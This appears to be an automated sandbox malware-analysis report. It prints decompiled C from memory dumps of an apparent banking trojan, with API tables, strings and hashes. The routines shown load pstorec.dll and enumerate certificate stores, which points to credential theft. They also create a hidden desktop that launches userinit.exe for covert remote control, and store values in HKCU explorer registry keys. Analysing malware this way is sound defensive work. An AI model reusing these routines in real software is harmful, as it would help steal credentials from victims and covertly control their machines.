    						if(_t101 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t115 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t101 - 1;
    							_t115 = _t67 >> _t99 & 0x00000001;
    						}
    						_t116 = _t115 + _v8 * 2;
    						_v8 = _t116;
    						if(_t116 == 0) {
    							_v8 = 1;
    							do {
    								if(_t99 <= 0) {
    									_t125 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t102 = 0x1f;
    									_t126 = _t125 >> 0x1f;
    								} else {
    									_t102 = _t99 - 1;
    									_t126 = _t67 >> _t102 & 0x00000001;
    								}
    								_v8 = _t126 + _v8 * 2;
    								if(_t102 <= 0) {
    									_t67 =  *(_t98 + _t71);
    									_t98 = _t98 + 4;
    									_t99 = 0x1f;
    									_t128 = _t67 >> 0x1f;
    								} else {
    									_t99 = _t102 - 1;
    									_t128 = _t67 >> _t99 & 0x00000001;
    								}
    							} while (_t128 == 0);
    							_v8 = _v8 + 2;
    						}
    						asm("sbb ecx, ecx");
    						_v8 = _v8 +  ~0xd00;
    						_t87 = _v16;
    						_t119 = _t87 - _v12 + _a12;
    						_v16 = _t119;
    						 *((char*)(_t87 + _a12)) =  *_t119;
    						_t88 = _t87 + 1;
    						_v16 = _v16 + 1;
    						do {
    							 *((char*)(_t88 + _a12)) =  *_v16;
    							_t88 = _t88 + 1;
    							_v16 = _v16 + 1;
    							_t57 =  &_v8;
    							 *_t57 = _v8 - 1;
    						} while ( *_t57 != 0);
    						_v16 = _t88;
    						goto L6;
    					}
    					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
    					_t98 = _t98 + 1;
    					if(_t79 != 0xffffffff) {
    						_t81 = _t79 + 1;
    						_v20 = _t81;
    						goto L19;
    					}
    					_t68 = _a16;
    					 *_t68 = _v16;
    					return _t68 & 0xffffff00 | _t98 == _a8;
    				}
    			}

    0x004102e1
    0x004102e5
    0x004102ea
    0x004102ec
    0x004102ef
    0x00000000
    0x004102f6
    0x004102f8
    0x0041030b
    0x0041030d
    0x00410310
    0x00410311
    0x004102fa
    0x004102fa
    0x00410301
    0x00410301
    0x00410316
    0x00410321
    0x00410324
    0x00410327
    0x00410328
    0x00410328
    0x00000000
    0x00410328
    0x0041032d
    0x00410334
    0x00410336
    0x00410344
    0x0041034b
    0x0041034e
    0x0041034f
    0x00410338
    0x00410338
    0x0041033f
    0x0041033f
    0x00410358
    0x0041035d
    0x0041036b
    0x00410372
    0x00410375
    0x00410376
    0x0041035f
    0x0041035f
    0x00410366
    0x00410366
    0x00410379
    0x0041037d
    0x00410383
    0x00410385
    0x004103a4
    0x004103a4
    0x004103a9
    0x004103ba
    0x004103bf
    0x004103c7
    0x004103c8
    0x004103ab
    0x004103ab
    0x004103b5
    0x004103b5
    0x004103cd
    0x004103db
    0x004103e2
    0x004103e5
    0x004103e6
    0x004103cf
    0x004103cf
    0x004103d6
    0x004103d6
    0x004103ec
    0x004103ef
    0x004103f4
    0x004103f6
    0x004103fd
    0x004103ff
    0x00410412
    0x00410414
    0x00410417
    0x00410418
    0x00410401
    0x00410401
    0x00410408
    0x00410408
    0x00410421
    0x00410426
    0x00410434
    0x0041043b
    0x0041043e
    0x0041043f
    0x00410428
    0x00410428
    0x0041042f
    0x0041042f
    0x00410442
    0x00410446
    0x00410446
    0x00410452
    0x00410456
    0x00410459
    0x00410461
    0x00410466
    0x0041046c
    0x0041046f
    0x00410470
    0x00410473
    0x0041047b
    0x0041047e
    0x0041047f
    0x00410482
    0x00410482
    0x00410482
    0x00410487
    0x00000000
    0x00410487
    0x00410394
    0x00410396
    0x0041039a
    0x004103a0
    0x004103a1
    0x00000000
    0x004103a1
    0x0041048f
    0x0041049a
    0x004104a1
    0x004104a1

    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction ID: 2052d4281a3d90c27205f1ca7150a7f4f1dc2504459acb9ee385333bf5e3f5c8
    • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction Fuzzy Hash: CF51DA32E019299BDB14CE58C4502EDF7B1EF85324F1A41AADD66BF381C6B4ADC1D784
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.464199377.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6511a4327051b7be31b983a9ab75a75ed9122f4dada8e0244f727c4d72e9071a
    • Instruction ID: 649cd37e71bc0638f05c0231eb38df82e76747a98814b4e6410aae599caddb71
    • Opcode Fuzzy Hash: 6511a4327051b7be31b983a9ab75a75ed9122f4dada8e0244f727c4d72e9071a
    • Instruction Fuzzy Hash: 0321CE36128FD19EC7228A3CC41468A7FD1FA5A6113CC0BDEC4C08F693D760945ADBCA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00410003() {
    				signed int _t18;
    				signed int _t38;
    				signed int _t55;
    				signed int _t56;
    				signed int* _t59;
    				signed int _t60;
    				signed int* _t61;
    
    				_t18 =  *0x418070; // 0x1c1
    				if(_t18 >= 0x270) {
    					_t60 = 0;
    					do {
    						_t55 = _t60 << 2;
    						_t1 = _t55 + 0x4176ac; // 0x1ec5befd
    						_t2 = 0x4176a8 + _t55; // 0xa014c253
    						_t3 = 0x4176a8 + _t55; // 0xa014c253
    						_t6 = _t55 + 0x417cdc; // 0x8c27497
    						_t60 = _t60 + 1;
    						 *(0x4176a8 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x41652c + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
    					} while (_t60 < 0xe3);
    					if(_t60 < 0x26f) {
    						_t59 =  &(0x4176a8[_t60]);
    						do {
    							_t10 =  &(_t59[1]); // 0x4
    							_t61 = _t10;
    							 *_t59 =  *(0x41652c + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
    							_t59 = _t61;
    						} while (_t59 < 0x418064);
    					}
    					_t56 =  *0x418064; // 0x170e954e
    					_t38 =  *0x4176a8; // 0xa014c253
    					 *0x418064 = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x41652c + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x417cd8;
    					_t18 = 0;
    				}
    				 *0x418070 = _t18 + 1;
    				return (0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b ^ ((0x4176a8[_t18] ^ 0x4176a8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
    			}

    0x00410003
    0x0041000d
    0x00410015
    0x0041001c
    0x0041001e
    0x00410021
    0x00410027
    0x0041002f
    0x00410043
    0x00410049
    0x00410050
    0x00410050
    0x0041005e
    0x00410060
    0x00410067
    0x00410069
    0x00410069
    0x00410088
    0x0041008a
    0x0041008c
    0x00410067
    0x00410094
    0x0041009a
    0x004100bb
    0x004100c0
    0x004100c0
    0x004100ca
    0x004100f5

    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 55cbc62ff1998b03969c92e3c9ddedc467e7e45992083c2753fe463a97d08030
    • Instruction ID: 791ddf2f0d4ca3f6eb6ea8a6629241e8d784f5dee080fe2e61f9478f22b93e39
    • Opcode Fuzzy Hash: 55cbc62ff1998b03969c92e3c9ddedc467e7e45992083c2753fe463a97d08030
    • Instruction Fuzzy Hash: 54214F323218058FD748CF3CEC95A9637E2F78D32472A857DD119CB290DA76E852CB48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E00405833(void* __ecx) {
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				void* _v20;
    				short _v540;
    				signed int _t44;
    				void* _t45;
    				int _t50;
    				void* _t55;
    				char _t58;
    				void* _t63;
    				void* _t74;
    				void* _t78;
    				void* _t84;
    				void* _t88;
    				signed int _t89;
    				WCHAR* _t91;
    				WCHAR* _t92;
    				WCHAR* _t93;
    				intOrPtr _t109;
    
    				_t88 = __ecx;
    				 *0x416778 = 0;
    				E0040B826(0);
    				E00414B7A();
    				L004042E5();
    				E004082DF();
    				 *0x41807c = 0;
    				_v16 = 1;
    				lstrcpyW( &_v540,  *0x416bb0);
    				_t91 = L"rsldps";
    				lstrcatW( &_v540, _t91);
    				_v20 = CreateMutexW(0x417680, 1, _t91);
    				if(GetLastError() == 0) {
    					_t92 = "09ck_=ldfuihpfre";
    					_t55 = E00408471(_t39, _t88, 1, _t92);
    					_t99 = _t55 - 4;
    					if(_t55 != 4) {
    						E004051FC();
    						_push( &_v16);
    						_push(_t92);
    						_push(1);
    						_t84 = 4;
    						E004084E1(_t84, _t99);
    					}
    					_t93 = "3709128dk0023444";
    					_v8 = 0;
    					if(E00408471( &_v8, _t88, 1, _t93) != 4) {
    						_v12 = 0;
    					} else {
    						_v12 =  *_v8;
    					}
    					_t58 = E004046EE(_t88, 0, L"MY", 0, _v12);
    					_v16 = _t58;
    					_t101 = _t58 - _v12;
    					if(_t58 != _v12) {
    						_push( &_v16);
    						_push(_t93);
    						_push(1);
    						_t78 = 4;
    						E004084E1(_t78, _t101);
    					}
    					E0040F0C0(_v8);
    					_t94 = "!!!0-0=9-0=23434";
    					_v8 = 0;
    					if(E00408471( &_v8, _t88, 1, "!!!0-0=9-0=23434") != 0) {
    						_t74 = E0040811E(_t88, _v8, _t61);
    						_t103 = _t74;
    						if(_t74 != 0) {
    							E00408558(_t103, 1, _t94);
    						}
    						E0040F0C0(_v8);
    					}
    					_t95 = "~23324m\'m434dKkl";
    					_t63 = E00408471(0, _t88, 1, "~23324m\'m434dKkl");
    					_t104 = _t63 - 4;
    					if(_t63 == 4) {
    						 *0x416d0c(0x10000, 0, 0, E00404833);
    						E00408558(_t104, 1, _t95);
    					}
    					_t96 = "3208()_*09303333";
    					_v8 = 0;
    					if(E00408471( &_v8, _t88, 1, "3208()_*09303333") == 4) {
    						_t67 = _v8;
    						_t24 =  *_v8 == 0;
    						E004055B9((_t67 & 0xffffff00 |  *_v8 == 0x00000000) & 0x000000ff);
    						E00408558(_t24, 1, _t96);
    					}
    					E0040F0C0(_v8);
    				}
    				if(_v20 != 0) {
    					CloseHandle(_v20);
    				}
    				 *0x417064 = 0;
    				 *0x417060 = 0;
    				 *0x416fe4(0x417048);
    				 *0x417024 = 0;
    				 *0x417020 = 0;
    				 *0x417028 = 0;
    				 *0x41702c = 0;
    				 *0x416fe4(0x417030);
    				 *0x416fe4(0x416798);
    				 *0x4167b8 = 0;
    				E00405E22();
    				_t44 = 0;
    				_t89 = 0;
    				 *0x4167bc = 0;
    				 *0x4167b4 = 0;
    				_t109 =  *0x41651c; // 0x4164f4
    				if(_t109 == 0) {
    					L21:
    					 *0x4169e8 = 0;
    					 *0x4169ec = 0;
    					_t45 = E0040493A();
    					if( *0x418080 == 0xffffffff) {
    						E0040F173(_t45, 0x416a18, 0, 0x50);
    						_t50 = RegisterClipboardFormatW(L"HomeWorkMessage1");
    						 *0x416a10 = _t50;
    						if(_t50 != 0) {
    							 *0x416fe4(0x416a34);
    						} else {
    							 *0x418080 = 0;
    						}
    					}
    					 *0x416fe4(0x41677c);
    					E004072F3(0x4164a0, 0xffffffff);
    					return 1;
    				} else {
    					do {
    						_t28 = _t44 + 0x416518; // 0x4169e4
    						 *((intOrPtr*)( *_t28)) = 0;
    						_t89 = _t89 + 1;
    						_t44 = _t89 * 0xc;
    					} while ( *((intOrPtr*)(_t44 + 0x41651c)) != 0);
    					goto L21;
    				}
    			}

    APIs
      • Part of subcall function 0040B826: CharLowerBuffA.USER32(00000000,00000031,?,-80000002,025DF9A0,025DF870,00000001,?,00000002), ref: 0040B959
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(?,025DF5A8,025DF770,00000000), ref: 00414BA1
      • Part of subcall function 00414B7A: PathCombineW.SHLWAPI(00417478,00417478,?), ref: 00414BB0
    • lstrcpyW.KERNEL32(?), ref: 00405876
    • lstrcatW.KERNEL32(?,rsldps), ref: 00405889
    • CreateMutexW.KERNEL32(00417680,00000001,rsldps), ref: 00405896
    • GetLastError.KERNEL32 ref: 0040589F
    • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,00404833), ref: 00405972
    • CloseHandle.KERNEL32(?), ref: 004059BE
    • RtlInitializeCriticalSection.NTDLL(00417048), ref: 004059D5
    • RtlInitializeCriticalSection.NTDLL(00417030), ref: 004059F8
    • RtlInitializeCriticalSection.NTDLL(00416798), ref: 00405A03
    • RegisterClipboardFormatW.USER32(HomeWorkMessage1), ref: 00405A6E
    • RtlInitializeCriticalSection.NTDLL(00416A34), ref: 00405A8A
      • Part of subcall function 004051FC: LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405212
      • Part of subcall function 004051FC: GetProcAddress.KERNELBASE(00000000), ref: 00405219
    • RtlInitializeCriticalSection.NTDLL(0041677C), ref: 00405A95
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$CombinePath$AddressBuffCertCharClipboardCloseCreateEnumErrorFormatHandleLastLibraryLoadLowerMutexProcRegisterStoreSystemlstrcatlstrcpy
    • String ID: !!!0-0=9-0=23434$09ck_=ldfuihpfre$3208()_*09303333$3709128dk0023444$HomeWorkMessage1$rsldps$~23324m'm434dKkl
    • API String ID: 3376213276-1824837563
    • Opcode ID: ac67833702d10734762169eb26c588ca7ebcd9e5562ae374e2779a658493c704
    • Instruction ID: 1aacd35b0114484f722f1f0b50e97e109845d7d7678958e6f30686a432ce3998
    • Opcode Fuzzy Hash: ac67833702d10734762169eb26c588ca7ebcd9e5562ae374e2779a658493c704
    • Instruction Fuzzy Hash: E8518075940214ABCB10AFA59D49DDF3B78EB49B14712857FF141B22D1CB788A40CF9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00408E1C(void* __ebx, void* __ecx, struct HWND__** _a4) {
    				struct tagMSG _v32;
    				char _v44;
    				struct _WNDCLASSW _v84;
    				void* _t33;
    				void* _t39;
    				int _t49;
    				void* _t55;
    				WCHAR* _t56;
    				WCHAR* _t58;
    				struct HWND__* _t59;
    				void* _t60;
    				struct HWND__** _t61;
    
    				_t60 = __ecx;
    				_t55 = __ebx;
    				_t61 = _a4;
    				_t61[1] = 0;
    				while(E00414119(_t60) == 0) {
    					if(WaitForSingleObject(_t61[2], 0x3e8) == 0x102) {
    						continue;
    					}
    					L17:
    					 *_t61 =  *_t61 | 0xffffffff;
    					CloseHandle(_t61[1]);
    					return 0;
    				}
    				_push(_t55);
    				_t56 = L"QggrrtyW";
    				_t33 = OpenFileMappingW(6, 0, _t56);
    				_t61[1] = _t33;
    				if(_t33 == 0) {
    					_t61[1] = CreateFileMappingW(0, 0x417680, 4, 0, 0xf42400, _t56);
    				}
    				if(_t61[1] != 0) {
    					E0040F0FC( &_v44, L"userinit.exe", 0x18);
    					 *0x418080 =  *0x418080 | 0xffffffff;
    					_v32.lParam = 0;
    					_t58 = L"SubCallssEdit7792";
    					_t39 = E0040BDF2(_t58, 1, 0,  &_v44);
    					 *0x418080 = 0;
    					if(_t39 != 0) {
    						Sleep(0x1388);
    						_v84.style = 0x200;
    						_v84.lpfnWndProc = E00408E05;
    						_v84.cbClsExtra = 0;
    						_v84.cbWndExtra = 0;
    						_v84.hInstance = GetModuleHandleA(0);
    						_v84.hIcon = 0;
    						_v84.hCursor = 0;
    						_v84.hbrBackground = 6;
    						_v84.lpszMenuName = 0;
    						_v84.lpszClassName = _t58;
    						if(RegisterClassW( &_v84) != 0) {
    							_t59 = CreateWindowExW(0x800a4, _v84.lpszClassName, 0x401008, 0, 0, 0, 0, 0, FindWindowW(L"Shell_TrayWnd", 0), 0, _v84.hInstance, 0);
    							if(_t59 != 0) {
    								 *_t61 = _t59;
    								ShowWindow(_t59, 4);
    								SetTimer(_t59, 0, 0x3e8, 0);
    								while(1) {
    									_t49 = GetMessageW( &_v32, _t59, 0, 0);
    									if(_t49 == 0) {
    										break;
    									}
    									if(_t49 != 0xffffffff && WaitForSingleObject(_t61[2], 0) != 0) {
    										DispatchMessageW( &_v32);
    										continue;
    									}
    									break;
    								}
    								 *0x416ae8(_t59);
    							}
    							UnregisterClassW(_v84.lpszClassName, _v84.hInstance);
    						}
    					}
    				}
    				goto L17;
    			}

    APIs
      • Part of subcall function 00414119: OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
      • Part of subcall function 00414119: CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
      • Part of subcall function 00414119: GetProcessWindowStation.USER32 ref: 00414156
      • Part of subcall function 00414119: OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
      • Part of subcall function 00414119: CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
      • Part of subcall function 00414119: GetCurrentThreadId.KERNEL32 ref: 00414195
      • Part of subcall function 00414119: GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
      • Part of subcall function 00414119: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
      • Part of subcall function 00414119: CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
      • Part of subcall function 00414119: CloseWindowStation.USER32(?,?), ref: 004141E2
    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00408E36
    • OpenFileMappingW.KERNEL32(00000006,00000000,QggrrtyW), ref: 00408E5A
    • CreateFileMappingW.KERNEL32(00000000,00417680,00000004,00000000,00F42400,QggrrtyW), ref: 00408E76
    • Sleep.KERNEL32(00001388,00000001,00000000,?,?,userinit.exe,00000018), ref: 00408ECB
    • GetModuleHandleA.KERNEL32(00000000), ref: 00408EE6
    • RegisterClassW.USER32(00000200), ref: 00408F06
    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00408F20
    • CreateWindowExW.USER32(000800A4,?,00401008,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408F39
    • ShowWindow.USER32(00000000,00000004), ref: 00408F4A
    • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 00408F58
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00408F69
    • DispatchMessageW.USER32(?), ref: 00408F77
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00408F84
    • UnregisterClassW.USER32(?,?), ref: 00408F9B
    • CloseHandle.KERNEL32(?), ref: 00408FA8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Window$Desktop$CreateStation$CloseOpenThread$ClassFileHandleMappingMessageObjectSingleWait$CurrentDispatchFindModuleProcessRegisterShowSleepTimerUnregister
    • String ID: QggrrtyW$Shell_TrayWnd$SubCallssEdit7792$userinit.exe
    • API String ID: 1772360239-2149883801
    • Opcode ID: c28ca6751f2e7661f9a361af20d3f42b152a2c2f202fec7a52624afe3808fcaa
    • Instruction ID: b39eb0b77ee67d016617acbd1a2b46b5fea6aa486c3f0a7b2b53bb9763b8356d
    • Opcode Fuzzy Hash: c28ca6751f2e7661f9a361af20d3f42b152a2c2f202fec7a52624afe3808fcaa
    • Instruction Fuzzy Hash: A54158B1941229ABCB115FA5DD48ADFBE7DFF09760B11822AF155F21D0CBB88441CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040859F() {
    				void** _t94;
    				signed int _t99;
    				long _t113;
    				long _t121;
    				long _t130;
    				short* _t136;
    				int _t138;
    				char* _t139;
    				intOrPtr* _t143;
    				void* _t145;
    				void* _t156;
    				int _t163;
    				int _t167;
    				void* _t170;
    				void* _t172;
    
    				_t170 = _t172 - 0x6c;
    				_t156 =  *( *(_t170 + 0x7c));
    				_t163 = 0;
    				if(_t156 <= 0x10) {
    					L46:
    					return _t163;
    				}
    				 *(_t170 + 0x68) = 0;
    				if((_t156 - 0x00000010 & 0xfffffffe) <= 0) {
    					goto L46;
    				} else {
    					_t136 =  *( *(_t170 + 0x78));
    					_t143 = _t136;
    					while( *_t143 != _t163) {
    						 *(_t170 + 0x68) =  *(_t170 + 0x68) + 1;
    						_t143 = _t143 + 2;
    						if( *(_t170 + 0x68) < _t156 - 0x10 >> 1) {
    							continue;
    						} else {
    							L45:
    							goto L46;
    						}
    					}
    					_t145 = E0040F533(_t136) + _t80;
    					_t150 = _t145 + _t136 + 2;
    					 *(_t170 + 0x64) = _t145 + _t136 + 2 + 0x10;
    					 *(_t170 + 0x60) = _t136 -  *(_t170 + 0x64) + _t156;
    					if(_t156 - _t145 + 2 < 0x10) {
    						goto L45;
    					}
    					E00408175(_t170 - 4, _t150);
    					if( *_t136 != 0x2a ||  *((intOrPtr*)(_t136 + 2)) != 0) {
    						E004100F6(_t170 + 0x4c, _t136, E0040F533(_t136) + _t86);
    						E00408175(_t170 - 0x54, _t170 + 0x4c);
    						PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
    						_t138 =  *(_t170 + 0x74);
    						_t94 = _t170 + 0x68;
    						if(_t138 != 0xf) {
    							_t99 = RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, (0 | _t138 == 0x00000011) + 1, _t94);
    						} else {
    							_t99 = RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t94, 0);
    						}
    						asm("sbb esi, esi");
    						_t163 =  ~_t99 + 1;
    						if(_t163 == 0) {
    							goto L45;
    						} else {
    							if(_t138 != 0xf) {
    								if(_t138 != 0x11) {
    									if(_t138 == 0x10) {
    										_t163 = 0;
    										if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, 0, _t170 + 0x74) == 0) {
    											_t139 = E0040F0A8( *(_t170 + 0x74));
    											if(_t139 != 0) {
    												if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, _t139, _t170 + 0x74) != 0) {
    													E0040F0C0(_t139);
    												} else {
    													_t167 =  *(_t170 + 0x78);
    													E0040F0C0( *_t167);
    													 *_t167 = _t139;
    													_t163 =  *(_t170 + 0x74);
    													 *( *(_t170 + 0x7c)) = _t163;
    												}
    											}
    										}
    									}
    									L43:
    									_push( *(_t170 + 0x68));
    									goto L44;
    								}
    								_t113 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
    								L36:
    								asm("sbb esi, esi");
    								_t163 =  ~_t113 + 1;
    								goto L43;
    							}
    							_t113 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
    							goto L36;
    						}
    					} else {
    						if(RegOpenKeyExW(0x80000001, L"software\\microsoft\\windows\\currentversion\\explorer", 0, 8, _t170 + 0x5c) != 0) {
    							goto L45;
    						} else {
    							 *(_t170 + 0x78) = 0;
    							while(1) {
    								 *(_t170 + 0x7c) = 0x28;
    								_t121 = RegEnumKeyExW( *(_t170 + 0x5c),  *(_t170 + 0x78), _t170 - 0x54, _t170 + 0x7c, 0, 0, 0, _t170 + 0x54);
    								if(_t121 == 0xea) {
    									goto L26;
    								}
    								if(_t121 != 0) {
    									_push( *(_t170 + 0x5c));
    									L44:
    									RegCloseKey();
    									goto L45;
    								}
    								if( *(_t170 + 0x7c) == 0x26 &&  *(_t170 - 0x54) == 0x7b &&  *((short*)(_t170 - 0xa)) == 0x7d) {
    									PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
    									if( *(_t170 + 0x74) != 0x11) {
    										if( *(_t170 + 0x74) != 0xf) {
    											 *(_t170 + 0x68) = 0;
    											L25:
    											RegCloseKey( *(_t170 + 0x68));
    											goto L26;
    										}
    										if(RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t170 + 0x68, 0) != 0) {
    											goto L25;
    										}
    										_t130 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
    										L22:
    										if(_t130 == 0) {
    											_t163 = _t163 + 1;
    										}
    										goto L25;
    									}
    									if(RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, 2, _t170 + 0x68) != 0) {
    										goto L25;
    									} else {
    										_t130 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
    										goto L22;
    									}
    								}
    								L26:
    								 *(_t170 + 0x78) =  *(_t170 + 0x78) + 1;
    							}
    						}
    					}
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,software\microsoft\windows\currentversion\explorer,00000000,00000008,?), ref: 0040864C
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00408679
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?), ref: 004086C2
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000002,?), ref: 004086DD
    • RegDeleteValueW.ADVAPI32(?,?), ref: 004086EE
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040870F
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00408729
      • Part of subcall function 004100F6: CryptAcquireContextW.ADVAPI32(0041420C,00000000,00000000,00000001,F0000040,?,0041420C,00000000,?,-0000001C,00000000,?,?,?), ref: 0041010F
      • Part of subcall function 004100F6: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00410127
      • Part of subcall function 004100F6: CryptHashData.ADVAPI32(?,00000010), ref: 00410142
      • Part of subcall function 004100F6: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00410159
      • Part of subcall function 004100F6: CryptDestroyHash.ADVAPI32(?), ref: 00410170
      • Part of subcall function 004100F6: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041017A
    • RegCloseKey.ADVAPI32(?), ref: 0040873C
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?,?,?,00000000), ref: 00408781
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000,?,00000000), ref: 004087A6
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000), ref: 004087C6
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?,?,00000000), ref: 004087F0
    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00408804
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00408828
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040884E
    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00408877
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CryptValue$Hash$CreateOpen$CloseCombineContextDeletePathQuery$AcquireDataDestroyEnumFreeHeapParamRelease
    • String ID: *$software\microsoft\windows\currentversion\explorer
    • API String ID: 1179558880-1506458415
    • Opcode ID: f37ea75c7dbe27713caf3b3409e7e0d1b945bb1404c9c454d1352a4d168736e8
    • Instruction ID: ad3c37aecbf0aac38b0feac2d031107020245f123866567aa47d907a8239d95a
    • Opcode Fuzzy Hash: f37ea75c7dbe27713caf3b3409e7e0d1b945bb1404c9c454d1352a4d168736e8
    • Instruction Fuzzy Hash: 2E916B71500208AFEF20DFA5CD88EEE7BBDEB45740B20813AF955A2195EB34DD45CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00406CD8(intOrPtr _a4, char* _a8, intOrPtr _a12) {
    				char _v32;
    				intOrPtr _v48;
    				char _v52;
    				char _v56;
    				intOrPtr _v64;
    				intOrPtr _v72;
    				char _v76;
    				char _v84;
    				intOrPtr _v88;
    				intOrPtr _v96;
    				char _v1100;
    				signed char _v1125;
    				signed char _v1126;
    				signed char _v1127;
    				signed char _v1128;
    				signed int _v1130;
    				char _v1132;
    				intOrPtr _v1136;
    				intOrPtr _v1140;
    				char _v1144;
    				char _v1148;
    				char _v1149;
